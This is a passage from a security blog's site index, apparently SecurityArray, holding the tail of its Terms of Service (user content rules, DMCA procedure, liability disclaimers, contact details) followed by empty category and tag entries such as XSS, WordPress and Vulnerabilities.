You agree that this license includes the right for Us to make Your Content available to other users of the Service, who may also use Your Content subject to these Terms.\nYou represent and warrant that: (i) the Content is Yours (You own it) or You have the right to use it and grant Us the rights and license as provided in these Terms, and (ii) the posting of Your Content on or through the Service does not violate the privacy rights, publicity rights, copyrights, contract rights or any other rights of any person.\nContent Restrictions # The Company is not responsible for the content of the Service\u0026rsquo;s users. You expressly understand and agree that You are solely responsible for the Content and for all activity that occurs under your account, whether done so by You or any third person using Your account. You may not transmit any Content that is unlawful, offensive, upsetting, intended to disgust, threaten, libelous, defamatory, obscene, or otherwise objectionable. Examples of such objectionable Content include, but are not limited to, the following:\nUnlawful or promoting unlawful activity. Defamatory, discriminatory, or mean-spirited content, including references or commentary about religion, race, sexual orientation, gender, national/ethnic origin, or other targeted groups. Spam, machine \u0026ndash; or randomly \u0026ndash; generated, constituting unauthorized or unsolicited advertising, chain letters, any other form of unauthorized solicitation, or any form of lottery or gambling. Containing or installing any viruses, worms, malware, trojan horses, or other content that is designed or intended to disrupt, damage, or limit the functioning of any software, hardware or telecommunications equipment or to damage or obtain unauthorized access to any data or other information of a third person. Infringing on any proprietary rights of any party, including patent, trademark, trade secret, copyright, right of publicity or other rights. 
Impersonating any person or entity including the Company and its employees or representatives. Violating the privacy of any third person. False information and features. The Portal reserves the right, but not the obligation, to, in its sole discretion, determine whether or not any Content is appropriate and complies with this Terms, refuse or remove this Content. The Portal further reserves the right to make formatting and edits and change the manner of any Content. The Portal can also limit or revoke the use of the Service if You post such objectionable Content. As the Portal cannot control all content posted by users and/or third parties on the Service, you agree to use the Service at your own risk. You understand that by using the Service You may be exposed to content that You may find offensive, indecent, incorrect, or objectionable, and You agree that under no circumstances will the Portal be liable in any way for any content, including any errors or omissions in any content, or any loss or damage of any kind incurred as a result of your use of any content.\nContent Backups # Although regular backups of Content are performed, the Portal does not guarantee there will be no loss or corruption of data. Corrupt or invalid backup points may be caused by, without limitation, Content that is corrupted prior to being backed up or that changes during the time a backup is performed.\nThe Portal will provide support and attempt to troubleshoot any known or discovered issues that may affect the backups of Content. But You acknowledge that the Portal has no liability related to the integrity of Content or the failure to successfully restore Content to a usable state.\nYou agree to maintain a complete and accurate copy of any Content in a location independent of the Service.\nCopyright Policy # Intellectual Property Infringement\nWe respect the intellectual property rights of others. 
It is Our policy to respond to any claim that Content posted on the Service infringes a copyright or other intellectual property infringement of any person.\nIf You are a copyright owner or authorized on behalf of one, and You believe that the copyrighted work has been copied in a way that constitutes copyright infringement that is taking place through the Service, You must submit Your notice in writing to the attention of our copyright agent via email hello@securityarray.net and include in Your notice a detailed description of the alleged infringement.\nYou may be held accountable for damages (including costs and attorneys\u0026rsquo; fees) for misrepresenting that any Content is infringing Your copyright.\nDMCA Notice and DMCA Procedure for Copyright Infringement Claims # You may submit a notification pursuant to the Digital Millennium Copyright Act (DMCA) by providing our Copyright Agent with the following information in writing (see 17 U.S.C 512(c)(3) for further detail):\nAn electronic or physical signature of the person authorized to act on behalf of the owner of the copyright\u0026rsquo;s interest. A description of the copyrighted work that You claim has been infringed, including the URL (i.e., web page address) of the location where the copyrighted work exists or a copy of the copyrighted work. Identification of the URL or other specific location on the Service where the material that You claim is infringing is located. Your address, telephone number, and email address. A statement by You that You have a good faith belief that the disputed use is not authorized by the copyright owner, its agent, or the law. A statement by You, made under penalty of perjury, that the above information in Your notice is accurate and that You are the copyright owner or authorized to act on the copyright owner\u0026rsquo;s behalf. You can contact our copyright agent via email hello@securityarray.net. 
Upon receipt of notification, the Portal will take whatever action, in its sole discretion, it deems appropriate, including removal of the challenged content from the Service.\nIntellectual Property # The Service and its original content (excluding Content provided by You or other users), features, and functionality are and will remain the exclusive property of the Portal and its licensors. The Service is protected by copyright, trademark, and other laws of both the Country and foreign countries. Our trademarks and trade dress may not be used in connection with any product or service without the prior written consent of the Company.\nYour Feedback to Us # You assign all rights, title, and interest in any Feedback You provide to the Portal. If for any reason such assignment is ineffective, You agree to grant the Portal a non-exclusive, perpetual, irrevocable, royalty-free, worldwide right and license to use, reproduce, disclose, sub-license, distribute, modify and exploit such Feedback without restriction.\nLinks to Other Websites # Our Service may contain links to third-party websites or services that are not owned or controlled by the Portal. The Portal has no control over and assumes no responsibility for, the content, privacy policies, or practices of any third-party websites or services. 
You further acknowledge and agree that the Portal shall not be responsible or liable, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any such content, goods, or services available on or through any such websites or services.\nWe strongly advise You to read the terms and conditions and privacy policies of any third-party websites or services that You visit.\nTermination # We may terminate or suspend Your Account immediately, without prior notice or liability, for any reason whatsoever, including without limitation if You breach these Terms of Service.\nUpon termination, Your right to use the Service will cease immediately. If You wish to terminate Your Account, You may simply discontinue using the Service.\nLimitation of Liability # Notwithstanding any damages that You might incur, the entire liability of the Portal and any of its suppliers under any provision of this Terms and Your exclusive remedy for all of the foregoing shall be limited to the amount actually paid by You through the Service or anything through the Service.\nTo the maximum extent permitted by applicable law, in no event shall the Portal or its suppliers be liable for any special, incidental, indirect, or consequential damages whatsoever (including, but not limited to, damages for loss of profits, loss of data or other information, business interruption, for personal injury, loss of privacy arising out of or in any way related to the use of or inability to use the Service, third-party software and/or third-party hardware used with the Service, or otherwise in connection with any provision of this Terms), even if the Portal or any supplier has been advised of the possibility of such damages and even if the remedy fails of its essential purpose.\nSome states do not allow the exclusion of implied warranties or limitation of liability for incidental or consequential damages, which means that some of the above limitations may 
not apply. In these states, each party\u0026rsquo;s liability will be limited to the greatest extent permitted by law.\nMutual understanding # Misunderstanding is possible in all contractual relationships. Imagine the disaster if you expect to receive payment for materials before building a product but the customer believes payment is not due until delivery. If you do not have the prepayment terms in writing, it makes it difficult to enforce terms in your best interest.\nThe same is true with service or product quality, deadlines for completion or delivery, and returns and refunds. If a client can review these terms before purchasing your product or service, everyone enters the transaction informed. This prevents misunderstandings that can lead to dispute resolution procedures later.\nLicense and Site Access # We grant you a limited license to access and make personal use of this website. You are not allowed to download or modify it. This may be done only with written consent from us.\n\u0026ldquo;AS IS\u0026rdquo; and \u0026ldquo;AS AVAILABLE\u0026rdquo; Disclaimer\nThe Service is provided to You \u0026ldquo;AS IS\u0026rdquo; and \u0026ldquo;AS AVAILABLE\u0026rdquo; and with all faults and defects without warranty of any kind. 
To the maximum extent permitted under applicable law, the Portal, on its own behalf and on behalf of its Affiliates and its and their respective licensors and service providers, expressly disclaims all warranties, whether express, implied, statutory or otherwise, with respect to the Service, including all implied warranties of merchantability, fitness for a particular purpose, title and non-infringement, and warranties that may arise out of course of dealing, course of performance, usage or trade practice.\nWithout limitation to the foregoing, the Portal provides no warranty or undertaking, and makes no representation of any kind that the Service will meet Your requirements, achieve any intended results, be compatible or work with any other software, applications, systems or services, operate without interruption, meet any performance or reliability standards or be error free or that any errors or defects can or will be corrected.\nWithout limiting the foregoing, neither the Portal nor any of the portal providers makes any representation or warranty of any kind, express or implied: (i) as to the operation or availability of the Service, or the information, content, and materials or products included thereon; (ii) that the Service will be uninterrupted or error-free; (iii) as to the accuracy, reliability, or currency of any information or content provided through the Service; or (iv) that the Service, its servers, the content, or e-mails sent from or on behalf of the portal are free of viruses, scripts, trojan horses, worms, malware, timebombs or other harmful components.\nSome jurisdictions do not allow the exclusion of certain types of warranties or limitations on applicable statutory rights of a consumer, so some or all of the above exclusions and limitations may not apply to You. 
But in such a case the exclusions and limitations set forth in this section shall be applied to the greatest extent enforceable under applicable law.\nGoverning Law # The laws of the Country, excluding its conflicts of law rules, shall govern this Terms and Your use of the Service. Your use of the Application may also be subject to other local, state, national, or international laws.\nDisputes Resolution # If You have any concerns or disputes about the Service, You agree to first try to resolve the dispute informally by contacting the Portal.\nFor European Union (EU) Users\nIf You are a European Union consumer, you will benefit from any mandatory provisions of the law of the country in which you are resident.\nIndia Legal Compliance\nYou represent and warrant that (i) You are not located in a country that is subject to India or that has been designated by the Indian government as a \u0026ldquo;terrorist supporting\u0026rdquo; country, and (ii) You are not listed on any Indian government list of prohibited or restricted parties.\nSeverability and Waiver # Severability\nIf any provision of these Terms is held to be unenforceable or invalid, such provision will be changed and interpreted to accomplish the objectives of such provision to the greatest extent possible under applicable law and the remaining provisions will continue in full force and effect.\nWaiver\nExcept as provided herein, the failure to exercise a right or to require performance of an obligation under these Terms shall not affect a party\u0026rsquo;s ability to exercise such right or require such performance at any time thereafter nor shall the waiver of a breach constitute a waiver of any subsequent breach.\nChanges to These Terms of Service # We reserve the right, at Our sole discretion, to modify or replace these Terms at any time. If a revision is material We will make reasonable efforts to provide at least 30 days\u0026rsquo; notice prior to any new terms taking effect. 
What constitutes a material change will be determined at Our sole discretion.\nBy continuing to access or use Our Service after those revisions become effective, You agree to be bound by the revised terms. If You do not agree to the new terms, in whole or in part, please stop using the website and the Service.\nContact Us # If you have any questions about these Terms of Service, You can contact us:\nBy visiting this page on our website: https://securityarray.net/about/ By sending us an email: hello@securityarray.net ","date":"5 August 2022","externalUrl":null,"permalink":"/terms-of-service/","section":"SecurityArray","summary":"","title":"Terms of Service","type":"page"},{"content":"","date":"28 September 2024","externalUrl":null,"permalink":"/categories/artificial-intelligence/","section":"Categories","summary":"","title":"Artificial Intelligence","type":"categories"},{"content":"","date":"28 September 2024","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","date":"28 September 2024","externalUrl":null,"permalink":"/posts/","section":"Posts","summary":"","title":"Posts","type":"posts"},{"content":"","date":"28 September 2024","externalUrl":null,"permalink":"/","section":"SecurityArray","summary":"","title":"SecurityArray","type":"page"},{"content":"","date":"7 May 2024","externalUrl":null,"permalink":"/categories/cms/","section":"Categories","summary":"","title":"CMS","type":"categories"},{"content":"","date":"7 May 2024","externalUrl":null,"permalink":"/tags/security/","section":"Tags","summary":"","title":"Security","type":"tags"},{"content":"","date":"7 May 2024","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"7 May 2024","externalUrl":null,"permalink":"/tags/wordpress/","section":"Tags","summary":"","title":"WordPress","type":"tags"},{"content":"","date":"13 January 
2023","externalUrl":null,"permalink":"/categories/application/","section":"Categories","summary":"","title":"Application","type":"categories"},{"content":"","date":"13 January 2023","externalUrl":null,"permalink":"/categories/vulnerabilities/","section":"Categories","summary":"","title":"Vulnerabilities","type":"categories"},{"content":"","date":"13 January 2023","externalUrl":null,"permalink":"/categories/web/","section":"Categories","summary":"","title":"Web","type":"categories"},{"content":"","date":"13 January 2023","externalUrl":null,"permalink":"/tags/xss-with-kurukshetra/","section":"Tags","summary":"","title":"XSS-With-Kurukshetra","type":"tags"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/tags/application/","section":"Tags","summary":"","title":"Application","type":"tags"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/categories/apps/","section":"Categories","summary":"","title":"Apps","type":"categories"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/tags/damn/","section":"Tags","summary":"","title":"Damn","type":"tags"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/categories/vulnerable/","section":"Categories","summary":"","title":"Vulnerable","type":"categories"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/tags/vulnerable/","section":"Tags","summary":"","title":"Vulnerable","type":"tags"},{"content":"","date":"30 September 2022","externalUrl":null,"permalink":"/tags/web/","section":"Tags","summary":"","title":"Web","type":"tags"},{"content":"","date":"20 August 2022","externalUrl":null,"permalink":"/categories/hardening/","section":"Categories","summary":"","title":"Hardening","type":"categories"},{"content":"","date":"20 August 2022","externalUrl":null,"permalink":"/tags/mitigation/","section":"Tags","summary":"","title":"Mitigation","type":"tags"},{"content":"","date":"20 August 
2022","externalUrl":null,"permalink":"/tags/xss/","section":"Tags","summary":"","title":"XSS","type":"tags"},{"content":"","date":"29 July 2022","externalUrl":null,"permalink":"/tags/burpsuite/","section":"Tags","summary":"","title":"BurpSuite","type":"tags"},{"content":"","date":"29 July 2022","externalUrl":null,"permalink":"/categories/security-tools/","section":"Categories","summary":"","title":"Security Tools","type":"categories"},{"content":"","date":"26 July 2022","externalUrl":null,"permalink":"/categories/security-foundations/","section":"Categories","summary":"","title":"Security Foundations","type":"categories"},{"content":"","date":"2 July 2022","externalUrl":null,"permalink":"/categories/security-awareness/","section":"Categories","summary":"","title":"Security Awareness","type":"categories"},{"content":"","date":"2 July 2022","externalUrl":null,"permalink":"/tags/security-awareness/","section":"Tags","summary":"","title":"Security-Awareness","type":"tags"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"}]